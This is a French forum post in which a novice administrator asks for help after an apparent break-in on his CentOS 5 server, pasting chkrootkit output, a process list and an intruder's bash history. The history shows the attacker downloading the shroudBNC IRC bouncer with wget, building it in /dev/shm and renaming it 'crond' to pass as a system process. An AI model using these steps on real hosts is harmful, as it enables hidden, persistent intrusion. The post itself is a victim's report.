Bonjour !
@noob inside !!
un petit malin (bien plus que moi vu je n'y connais rien) a très certainement pénétré mon petit serveur linux (Centos5).
petit historique :
Chkroot kit a ajouté cela à ses logs :
clamav ne veut plus logger correctement depuis vendredi; mail d'alerte :
Code : Sélectionner tout - Visualiser dans une fenêtre à part
1
2
3
4
5
6
7
8
9
10
11
12
13 Warning: `//root/.bash_history //home/.bash_history //var/html/.bash_history' file size is zero INFECTED (PORTS: 465) The tty of the following user process(es) were not found in /var/run/utmp ! ! root 3921 tty1 /sbin/mingetty tty1 ! root 3922 tty2 /sbin/mingetty tty2 ! root 3925 tty3 /sbin/mingetty tty3 ! root 3928 tty4 /sbin/mingetty tty4 ! root 3929 tty5 /sbin/mingetty tty5 ! root 3930 tty6 /sbin/mingetty tty6 ! root 13082 pts/1 /bin/bash
et un chkrootkit -x lkm me donne :
Code : Sélectionner tout - Visualiser dans une fenêtre à part
1
2
3
4
5
6
7
8
9
10 /etc/cron.hourly/freshclam: ERROR: Can't open /var/log/clamav/freshclam.log in append mode (check permissions!). /etc/cron.hourly/inn-cron-nntpsend: cannot determine current run level /etc/cron.hourly/inn-cron-rnews: cannot determine current run level /etc/cron.hourly/mcelog:
ce Dumas viens d’apparaître sur mon système dans /home/dumas/ avec ce .bash_history :ROOTDIR is `/'
find: WARNING: Hard link count is wrong for /proc/1: this may be a bug in your f ilesystem driver. Automatically turning on find's -noleaf option. Earlier resu lts may have failed to include directories that should have been searched.
###
### Output of: ./chkproc -v -v -p 3
###
CWD 11859: /
EXE 11859: /usr/local/psa/admin/bin/modules/watchdog/monit
CWD 13185: /var/lib/mysql
EXE 13185: /usr/libexec/mysqld
CWD 13186: /var/lib/mysql
EXE 13186: /usr/libexec/mysqld
CWD 13187: /var/lib/mysql
EXE 13187: /usr/libexec/mysqld
CWD 13188: /var/lib/mysql
EXE 13188: /usr/libexec/mysqld
CWD 13193: /var/lib/mysql
EXE 13193: /usr/libexec/mysqld
CWD 13194: /var/lib/mysql
EXE 13194: /usr/libexec/mysqld
CWD 13195: /var/lib/mysql
EXE 13195: /usr/libexec/mysqld
CWD 13196: /var/lib/mysql
EXE 13196: /usr/libexec/mysqld
CWD 13240: /home/dumas/ /sbnc
EXE 13240: /home/dumas/ /sbnc/bin/sbnc
CWD 13771: /var/lib/mysql
EXE 13771: /usr/libexec/mysqld
CWD 28578: /var/named/run-root/var
EXE 28578: /usr/sbin/named
CWD 28579: /var/named/run-root/var
EXE 28579: /usr/sbin/named
CWD 28580: /var/named/run-root/var
EXE 28580: /usr/sbin/named
CWD 28581: /var/named/run-root/var
EXE 28581: /usr/sbin/named
CWD 28962: /
EXE 28962: /usr/sbin/automount
CWD 28963: /
EXE 28963: /usr/sbin/automount
CWD 28966: /
EXE 28966: /usr/sbin/automount
CWD 28969: /
EXE 28969: /usr/sbin/automount
CWD 29323: /
EXE 29323: /sbin/auditd
CWD 29325: /
EXE 29325: /sbin/audispd
CWD 29816: /
EXE 29816: /usr/sbin/pcscd
help !!! là je suis en sueurs...
Code : Sélectionner tout - Visualiser dans une fenêtre à part
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96 cd /dev/shm w ps x cd /dev/shm ls -as cd sbnc-1.3beta6 cd src ls -as mv cron sbnc ./sbnc ./sbnc ps x kill -9 30017 ./sbnc kill -9 30017 ps x kill -9 30110 mv sbnc crond PATH=:$PATH crond ps x cd /dev/shm ls -as cd " . " ls -as cd sbnc-1.3beta6 make cd /home las -as ls -as cd /dev/shm ls -as wget http://www.shroudbnc.info/redmine/attachments/download/28/sbnc-1.3beta6.tar.gz tar zxvf sbnc-1.3beta6.tar.gz cd sbnc-1.3beta6 ls -sd ls -as ./configure make make install ls -as cd src ls -as ps x mv sbnc cron PATH=:$PATH crond ps x kill -9 30124 cd /dev/shm ls -as rm -rf * cd wget http://www.shroudbnc.info/redmine/attachments/download/28/sbnc-1.3beta6.tar.gz tar zxvf sbnc-1.3beta6.tar.gz rm -rf sbnc-1.3beta6.tar.gz cd sbnc-1.3beta6 ls -as ./configure ./configure* chmod +x * make ./make insall /make install ./make make install ls -as cd php ls -as cd src ls -as cd .. cd src ls .as ls -as ./sbnc ps x kill -9 11764 cd .. ls -as cd .. ls -as cd sbnc ls -as ./sbnc ./sbnc ls -as ps x kill -9 12718 mv sbnc crond PATH=:$PATH crond w last ps x kill -9 30461 16431 3356
Partager